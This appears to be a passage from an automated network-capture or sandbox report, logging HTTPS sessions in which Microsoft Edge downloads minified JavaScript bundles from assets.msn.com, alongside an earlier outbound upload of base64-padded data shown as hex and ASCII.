AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-11-25 10:34:05 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-11-25 10:34:05 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-11-25 10:34:05 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-11-25 10:34:05 UTC	16355	OUT	Data Raw: 30 63 32 4e 79 5a 57 56 75 58 33 56 79 62 46 39 69 62 47 39 6a 61 33 4e 66 59 6e 6c 77 59 58 4e 7a 5a 57 52 66 59 32 39 31 62 6e 52 6c 63 69 42 4a 54 6c 52 46 52 30 56 53 4c 48 4e 74 59 58 4a 30 63 32 4e 79 5a 57 56 75 58 32 52 76 64 32 35 73 62 32 46 6b 58 32 4a 73 62 32 4e 72 63 31 39 6a 62 33 56 75 64 47 56 79 49 45 6c 4f 56 45 56 48 52 56 49 73 63 32 31 68 63 6e 52 7a 59 33 4a 6c 5a 57 35 66 5a 47 39 33 62 6d 78 76 59 57 52 66 59 6d 78 76 59 32 74 7a 58 32 4a 35 63 47 46 7a 63 32 56 6b 58 32 4e 76 64 57 35 30 5a 58 49 67 53 55 35 55 52 55 64 46 55 69 78 7a 62 57 46 79 64 48 4e 6a 63 6d 56 6c 62 6c 39 74 59 57 78 32 5a 58 4a 30 61 58 4e 70 62 6d 64 66 59 6d 78 76 59 32 74 7a 58 32 4e 76 64 57 35 30 5a 58 49 67 53 55 35 55 52 55 64 46 55 69 78 68 59 6e Data Ascii: 0c2NyZWVuX3VybF9ibG9ja3NfYnlwYXNzZWRfY291bnRlciBJTlRFR0VSLHNtYXJ0c2NyZWVuX2Rvd25sb2FkX2Jsb2Nrc19jb3VudGVyIElOVEVHRVIsc21hcnRzY3JlZW5fZG93bmxvYWRfYmxvY2tzX2J5cGFzc2VkX2NvdW50ZXIgSU5URUdFUixzbWFydHNjcmVlbl9tYWx2ZXJ0aXNpbmdfYmxvY2tzX2NvdW50ZXIgSU5URUdFUixhYn
2024-11-25 10:34:05 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-11-25 10:34:07 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 25 Nov 2024 10:34:07 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
137	192.168.2.5	49901	23.209.72.7	443	7820	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-25 10:34:05 UTC	627	OUT	GET /bundles/v1/edgeChromium/latest/vendors.7e27cca6027b8d6697cb.js HTTP/1.1 Host: assets.msn.com Connection: keep-alive sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117" Origin: https://ntp.msn.com sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 sec-ch-ua-platform: "Windows" Accept: / Sec-Fetch-Site: same-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: script Referer: https://ntp.msn.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
2024-11-25 10:34:06 UTC	1237	IN	HTTP/1.1 200 OK Content-Type: application/javascript Content-MD5: 2o3TH2IeNXyf9OP87xu6FA== Last-Modified: Fri, 15 Nov 2024 22:31:11 GMT ETag: 0x8DD05C53565F83D Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0 x-ms-request-id: 64e866d1-101e-0037-3246-3988b3000000 x-ms-version: 2009-09-19 x-ms-lease-status: unlocked x-ms-blob-type: BlockBlob Date: Mon, 25 Nov 2024 10:34:06 GMT Transfer-Encoding: chunked Connection: close Connection: Transfer-Encoding Alt-Svc: h3=":443"; ma=86400 Akamai-Request-BC: [a=23.210.4.165,b=947766356,c=g,n=US_NJ_SECAUCUS,o=20940] Server-Timing: clientrtt; dur=2, clienttt; dur=1, origin; dur=0, cdntime; dur=1, wpo;dur=0,1s;dur=0 Akamai-Cache-Status: Hit from child Akamai-Server-IP: 23.210.4.165 Akamai-Request-ID: 387dc454 Access-Control-Allow-Credentials: true Access-Control-Allow-Origin: https://ntp.msn.com report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]} nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.1} Cache-Control: public, no-transform, max-age=31535892 Timing-Allow-Origin: * Akamai-GRN: 0.a504d217.1732530846.387dc454 Vary: Origin
2024-11-25 10:34:06 UTC	15147	IN	Data Raw: 30 30 30 30 36 30 30 30 0d 0a 2f 2a 21 20 46 6f 72 20 6c 69 63 65 6e 73 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 70 6c 65 61 73 65 20 73 65 65 20 76 65 6e 64 6f 72 73 2e 37 65 32 37 63 63 61 36 30 32 37 62 38 64 36 36 39 37 63 62 2e 6a 73 2e 4c 49 43 45 4e 53 45 2e 74 78 74 20 2a 2f 0a 28 73 65 6c 66 2e 65 64 67 65 43 68 72 6f 6d 69 75 6d 57 65 62 70 61 63 6b 43 68 75 6e 6b 73 3d 73 65 6c 66 2e 65 64 67 65 43 68 72 6f 6d 69 75 6d 57 65 62 70 61 63 6b 43 68 75 6e 6b 73 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 22 76 65 6e 64 6f 72 73 22 5d 2c 7b 37 33 30 34 30 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 66 75 6e 63 74 69 6f 6e 20 65 28 29 7b 7d 74 2e 65 78 70 6f 72 74 73 3d 65 2c 74 2e 65 78 70 6f 72 74 73 2e 48 74 74 70 73 41 67 65 6e 74 3d 65 7d 2c 31 33 30 31 Data Ascii: 00006000/! For license information please see vendors.7e27cca6027b8d6697cb.js.LICENSE.txt /(self.edgeChromiumWebpackChunks=self.edgeChromiumWebpackChunks\|\|[]).push([["vendors"],{73040:function(t){function e(){}t.exports=e,t.exports.HttpsAgent=e},1301
2024-11-25 10:34:06 UTC	9441	IN	Data Raw: 6e 28 74 2c 65 29 7b 76 61 72 20 6e 3d 6e 65 77 20 52 65 67 45 78 70 28 22 5e 28 3f 3a 28 5c 5c 64 7b 34 7d 7c 5b 2b 2d 5d 5c 5c 64 7b 22 2b 28 34 2b 65 29 2b 22 7d 29 7c 28 5c 5c 64 7b 32 7d 7c 5b 2b 2d 5d 5c 5c 64 7b 22 2b 28 32 2b 65 29 2b 22 7d 29 24 29 22 29 2c 72 3d 74 2e 6d 61 74 63 68 28 6e 29 3b 69 66 28 21 72 29 72 65 74 75 72 6e 7b 79 65 61 72 3a 4e 61 4e 2c 72 65 73 74 44 61 74 65 53 74 72 69 6e 67 3a 22 22 7d 3b 76 61 72 20 69 3d 72 5b 31 5d 3f 70 61 72 73 65 49 6e 74 28 72 5b 31 5d 29 3a 6e 75 6c 6c 2c 6f 3d 72 5b 32 5d 3f 70 61 72 73 65 49 6e 74 28 72 5b 32 5d 29 3a 6e 75 6c 6c 3b 72 65 74 75 72 6e 7b 79 65 61 72 3a 6e 75 6c 6c 3d 3d 3d 6f 3f 69 3a 31 30 30 2a 6f 2c 72 65 73 74 44 61 74 65 53 74 72 69 6e 67 3a 74 2e 73 6c 69 63 65 28 28 72 Data Ascii: n(t,e){var n=new RegExp("^(?:(\\d{4}\|[+-]\\d{"+(4+e)+"})\|(\\d{2}\|[+-]\\d{"+(2+e)+"})$)"),r=t.match(n);if(!r)return{year:NaN,restDateString:""};var i=r[1]?parseInt(r[1]):null,o=r[2]?parseInt(r[2]):null;return{year:null===o?i:100*o,restDateString:t.slice((r
2024-11-25 10:34:06 UTC	16384	IN	Data Raw: 30 30 30 30 36 30 30 30 0d 0a 75 78 2f 22 29 7d 2c 61 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 6b 65 79 73 28 74 29 2e 66 6f 72 45 61 63 68 28 28 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 72 65 74 75 72 6e 20 65 5b 6e 5d 3d 74 5b 6e 5d 7d 29 29 7d 2c 73 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 76 61 72 20 6e 3d 66 75 6e 63 74 69 6f 6e 20 6e 28 72 29 7b 69 66 28 65 28 72 29 29 7b 76 61 72 20 69 3d 74 28 72 29 3b 72 65 74 75 72 6e 20 61 28 74 2c 6e 29 2c 69 7d 72 65 74 75 72 6e 7b 7d 7d 3b 72 65 74 75 72 6e 20 61 28 74 2c 6e 29 2c 6e 7d 2c 66 3d 22 52 4f 4f 54 22 2c 6c 3d 22 4e 41 4d 45 53 50 41 43 45 5f 52 4f 4f 54 22 2c 76 3d 22 43 48 49 4c 44 22 2c 64 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 20 Data Ascii: 00006000ux/")},a=function(t,e){return Object.keys(t).forEach((function(n){return e[n]=t[n]}))},s=function(t,e){var n=function n(r){if(e(r)){var i=t(r);return a(t,n),i}return{}};return a(t,n),n},f="ROOT",l="NAMESPACE_ROOT",v="CHILD",d=function(t){return
2024-11-25 10:34:06 UTC	8204	IN	Data Raw: 65 3d 6c 5b 74 2e 63 68 61 72 41 74 28 6f 2b 2b 29 5d 3c 3c 31 38 7c 6c 5b 74 2e 63 68 61 72 41 74 28 6f 2b 2b 29 5d 3c 3c 31 32 7c 28 6e 3d 6c 5b 74 2e 63 68 61 72 41 74 28 6f 2b 2b 29 5d 29 3c 3c 36 7c 28 72 3d 6c 5b 74 2e 63 68 61 72 41 74 28 6f 2b 2b 29 5d 29 2c 69 2b 3d 36 34 3d 3d 3d 6e 3f 64 28 65 3e 3e 31 36 26 32 35 35 29 3a 36 34 3d 3d 3d 72 3f 64 28 65 3e 3e 31 36 26 32 35 35 2c 65 3e 3e 38 26 32 35 35 29 3a 64 28 65 3e 3e 31 36 26 32 35 35 2c 65 3e 3e 38 26 32 35 35 2c 32 35 35 26 65 29 3b 72 65 74 75 72 6e 20 69 7d 2c 4e 3d 6f 3f 74 3d 3e 61 74 6f 62 28 67 28 74 29 29 3a 63 3f 74 3d 3e 42 75 66 66 65 72 2e 66 72 6f 6d 28 74 2c 22 62 61 73 65 36 34 22 29 2e 74 6f 53 74 72 69 6e 67 28 22 62 69 6e 61 72 79 22 29 3a 4c 2c 44 3d 63 3f 74 3d 3e 70 Data Ascii: e=l[t.charAt(o++)]<<18\|l[t.charAt(o++)]<<12\|(n=l[t.charAt(o++)])<<6\|(r=l[t.charAt(o++)]),i+=64===n?d(e>>16&255):64===r?d(e>>16&255,e>>8&255):d(e>>16&255,e>>8&255,255&e);return i},N=o?t=>atob(g(t)):c?t=>Buffer.from(t,"base64").toString("binary"):L,D=c?t=>p
2024-11-25 10:34:06 UTC	2479	IN	Data Raw: 30 30 30 30 30 39 41 33 0d 0a 72 63 65 2c 45 2e 65 78 65 63 28 74 29 29 3b 72 65 74 75 72 6e 20 65 2e 6c 61 73 74 49 6e 64 65 78 3d 74 2e 6c 61 73 74 49 6e 64 65 78 2c 65 7d 2c 78 3d 6e 28 35 36 31 33 37 29 2c 5f 3d 78 2e 5a 3f 78 2e 5a 2e 70 72 6f 74 6f 74 79 70 65 3a 76 6f 69 64 20 30 2c 53 3d 5f 3f 5f 2e 76 61 6c 75 65 4f 66 3a 76 6f 69 64 20 30 3b 76 61 72 20 54 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 20 53 3f 4f 62 6a 65 63 74 28 53 2e 63 61 6c 6c 28 74 29 29 3a 7b 7d 7d 2c 4c 3d 6e 28 39 37 35 35 38 29 3b 76 61 72 20 4e 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 6e 29 7b 76 61 72 20 72 3d 74 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3b 73 77 69 74 63 68 28 65 29 7b 63 61 73 65 22 5b 6f 62 6a 65 63 74 20 41 72 72 61 79 42 75 66 66 65 72 5d Data Ascii: 000009A3rce,E.exec(t));return e.lastIndex=t.lastIndex,e},x=n(56137),_=x.Z?x.Z.prototype:void 0,S=_?_.valueOf:void 0;var T=function(t){return S?Object(S.call(t)):{}},L=n(97558);var N=function(t,e,n){var r=t.constructor;switch(e){case"[object ArrayBuffer]
2024-11-25 10:34:06 UTC	16384	IN	Data Raw: 30 30 30 30 34 30 30 30 0d 0a 3d 6e 28 37 31 31 35 35 29 3b 65 2e 5a 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 6e 2c 73 29 7b 76 61 72 20 66 3d 2d 31 2c 6c 3d 69 2e 5a 2c 76 3d 21 30 2c 64 3d 74 2e 6c 65 6e 67 74 68 2c 70 3d 5b 5d 2c 68 3d 65 2e 6c 65 6e 67 74 68 3b 69 66 28 21 64 29 72 65 74 75 72 6e 20 70 3b 6e 26 26 28 65 3d 28 30 2c 75 2e 5a 29 28 65 2c 28 30 2c 63 2e 5a 29 28 6e 29 29 29 2c 73 3f 28 6c 3d 6f 2e 5a 2c 76 3d 21 31 29 3a 65 2e 6c 65 6e 67 74 68 3e 3d 32 30 30 26 26 28 6c 3d 61 2e 5a 2c 76 3d 21 31 2c 65 3d 6e 65 77 20 72 2e 5a 28 65 29 29 3b 74 3a 66 6f 72 28 3b 2b 2b 66 3c 64 3b 29 7b 76 61 72 20 67 3d 74 5b 66 5d 2c 5a 3d 6e 75 6c 6c 3d 3d 6e 3f 67 3a 6e 28 67 29 3b 69 66 28 67 3d 73 7c 7c 30 21 3d 3d 67 3f 67 3a 30 2c 76 26 26 5a 3d Data Ascii: 00004000=n(71155);e.Z=function(t,e,n,s){var f=-1,l=i.Z,v=!0,d=t.length,p=[],h=e.length;if(!d)return p;n&&(e=(0,u.Z)(e,(0,c.Z)(n))),s?(l=o.Z,v=!1):e.length>=200&&(l=a.Z,v=!1,e=new r.Z(e));t:for(;++f<d;){var g=t[f],Z=null==n?g:n(g);if(g=s\|\|0!==g?g:0,v&&Z=
2024-11-25 10:34:06 UTC	12	IN	Data Raw: 6e 3a 64 65 6c 65 74 65 20 74 0d 0a Data Ascii: n:delete t
2024-11-25 10:34:06 UTC	16384	IN	Data Raw: 30 30 30 30 34 30 30 30 0d 0a 5b 63 5d 29 2c 69 7d 7d 2c 38 37 33 33 39 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 6e 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 72 3d 6e 28 38 30 33 32 33 29 2c 69 3d 6e 28 33 36 31 32 29 2c 6f 3d 4f 62 6a 65 63 74 2e 70 72 6f 74 6f 74 79 70 65 2e 70 72 6f 70 65 72 74 79 49 73 45 6e 75 6d 65 72 61 62 6c 65 2c 75 3d 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 2c 63 3d 75 3f 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 20 6e 75 6c 6c 3d 3d 74 3f 5b 5d 3a 28 74 3d 4f 62 6a 65 63 74 28 74 29 2c 28 30 2c 72 2e 5a 29 28 75 28 74 29 2c 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 6f 2e 63 61 6c 6c 28 74 2c 65 29 7d 29 29 29 7d 3a 69 2e 5a 3b 65 2e 5a 3d Data Ascii: 00004000[c]),i}},87339:function(t,e,n){"use strict";var r=n(80323),i=n(3612),o=Object.prototype.propertyIsEnumerable,u=Object.getOwnPropertySymbols,c=u?function(t){return null==t?[]:(t=Object(t),(0,r.Z)(u(t),(function(e){return o.call(t,e)})))}:i.Z;e.Z=
2024-11-25 10:34:06 UTC	12	IN	Data Raw: 3d 3d 74 79 70 65 6f 66 20 74 0d 0a Data Ascii: ==typeof t
2024-11-25 10:34:06 UTC	15599	IN	Data Raw: 30 30 30 30 33 43 45 33 0d 0a 7d 7d 2c 34 34 31 39 39 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 6e 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 72 3d 6e 28 34 38 35 31 30 29 2c 69 3d 6e 28 31 32 35 34 35 29 2c 6f 3d 6e 28 32 35 31 39 37 29 2c 75 3d 46 75 6e 63 74 69 6f 6e 2e 70 72 6f 74 6f 74 79 70 65 2c 63 3d 4f 62 6a 65 63 74 2e 70 72 6f 74 6f 74 79 70 65 2c 61 3d 75 2e 74 6f 53 74 72 69 6e 67 2c 73 3d 63 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 2c 66 3d 61 2e 63 61 6c 6c 28 4f 62 6a 65 63 74 29 3b 65 2e 5a 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 69 66 28 21 28 30 2c 6f 2e 5a 29 28 74 29 7c 7c 22 5b 6f 62 6a 65 63 74 20 4f 62 6a 65 63 74 5d 22 21 3d 28 30 2c 72 2e 5a 29 28 74 29 29 72 65 74 75 72 6e 21 31 3b 76 61 72 20 65 3d 28 30 2c 69 Data Ascii: 00003CE3}},44199:function(t,e,n){"use strict";var r=n(48510),i=n(12545),o=n(25197),u=Function.prototype,c=Object.prototype,a=u.toString,s=c.hasOwnProperty,f=a.call(Object);e.Z=function(t){if(!(0,o.Z)(t)\|\|"[object Object]"!=(0,r.Z)(t))return!1;var e=(0,i

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
138	192.168.2.5	49903	23.209.72.7	443	7820	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-25 10:34:05 UTC	629	OUT	GET /bundles/v1/edgeChromium/latest/microsoft.4a2a9ed8240d3004231b.js HTTP/1.1 Host: assets.msn.com Connection: keep-alive sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117" Origin: https://ntp.msn.com sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 sec-ch-ua-platform: "Windows" Accept: / Sec-Fetch-Site: same-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: script Referer: https://ntp.msn.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
2024-11-25 10:34:06 UTC	1237	IN	HTTP/1.1 200 OK Content-Type: application/javascript Content-MD5: HxbYbI6fIhdaRBln8Sc3OA== Last-Modified: Thu, 21 Nov 2024 21:45:21 GMT ETag: 0x8DD0A75CC92A95D Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0 x-ms-request-id: 3f59ebcd-b01e-0085-2e5e-3c96a0000000 x-ms-version: 2009-09-19 x-ms-lease-status: unlocked x-ms-blob-type: BlockBlob Date: Mon, 25 Nov 2024 10:34:06 GMT Transfer-Encoding: chunked Connection: close Connection: Transfer-Encoding Alt-Svc: h3=":443"; ma=86400 Akamai-Request-BC: [a=23.210.4.139,b=792126344,c=g,n=US_NJ_SECAUCUS,o=20940] Server-Timing: clientrtt; dur=2, clienttt; dur=1, origin; dur=0, cdntime; dur=1, wpo;dur=0,1s;dur=0 Akamai-Cache-Status: Hit from child Akamai-Server-IP: 23.210.4.139 Akamai-Request-ID: 2f36e388 Access-Control-Allow-Credentials: true Access-Control-Allow-Origin: https://ntp.msn.com report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]} nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.1} Cache-Control: public, no-transform, max-age=31535892 Timing-Allow-Origin: * Akamai-GRN: 0.8b04d217.1732530846.2f36e388 Vary: Origin
2024-11-25 10:34:06 UTC	15147	IN	Data Raw: 30 30 30 30 36 30 30 30 0d 0a 2f 2a 21 20 46 6f 72 20 6c 69 63 65 6e 73 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 70 6c 65 61 73 65 20 73 65 65 20 6d 69 63 72 6f 73 6f 66 74 2e 34 61 32 61 39 65 64 38 32 34 30 64 33 30 30 34 32 33 31 62 2e 6a 73 2e 4c 49 43 45 4e 53 45 2e 74 78 74 20 2a 2f 0a 28 73 65 6c 66 2e 65 64 67 65 43 68 72 6f 6d 69 75 6d 57 65 62 70 61 63 6b 43 68 75 6e 6b 73 3d 73 65 6c 66 2e 65 64 67 65 43 68 72 6f 6d 69 75 6d 57 65 62 70 61 63 6b 43 68 75 6e 6b 73 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 22 6d 69 63 72 6f 73 6f 66 74 22 5d 2c 7b 36 33 31 36 35 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 6e 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 6e 2e 64 28 65 2c 7b 5a 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 41 7d 7d 29 3b 76 Data Ascii: 00006000/! For license information please see microsoft.4a2a9ed8240d3004231b.js.LICENSE.txt /(self.edgeChromiumWebpackChunks=self.edgeChromiumWebpackChunks\|\|[]).push([["microsoft"],{63165:function(t,e,n){"use strict";n.d(e,{Z:function(){return A}});v
2024-11-25 10:34:06 UTC	9441	IN	Data Raw: 72 2e 62 24 2c 6f 2e 48 44 2c 6f 2e 68 6a 2c 6f 2e 6a 6e 2c 6f 2e 6d 66 2c 6f 2e 6b 4a 2c 6f 2e 4b 6e 2c 6f 2e 6e 64 2c 72 2e 4d 46 2c 6f 2e 59 36 2c 72 2e 63 70 2c 73 2e 70 37 2c 73 2e 55 59 2c 6f 2e 6c 5f 2c 6c 2e 63 39 2c 6c 2e 49 62 2c 6f 2e 49 64 2c 6f 2e 72 57 2c 6f 2e 59 6d 2c 6f 2e 6f 38 2c 6f 2e 6c 65 2c 6f 2e 6e 72 2c 6f 2e 6d 66 2c 6f 2e 4b 6e 2c 6f 2e 4a 5f 2c 6f 2e 6b 4a 2c 6f 2e 56 5a 2c 6f 2e 48 44 2c 6f 2e 68 6a 2c 6f 2e 6a 6e 2c 6f 2e 59 36 2c 6f 2e 74 4f 2c 6f 2e 55 41 2c 6f 2e 4d 72 2c 6f 2e 58 7a 2c 6f 2e 6e 64 2c 64 2e 70 75 2c 6f 2e 46 59 2c 6f 2e 6c 5f 2c 6c 2e 49 62 2c 6f 2e 6d 36 2c 72 2e 77 31 2c 61 2e 47 57 2c 61 2e 4a 6a 2c 75 2e 70 5a 2c 75 2e 61 7a 2c 75 2e 5f 6c 2c 75 2e 43 4e 2c 75 2e 46 36 2c 61 2e 44 4f 3b 66 75 6e 63 74 Data Ascii: 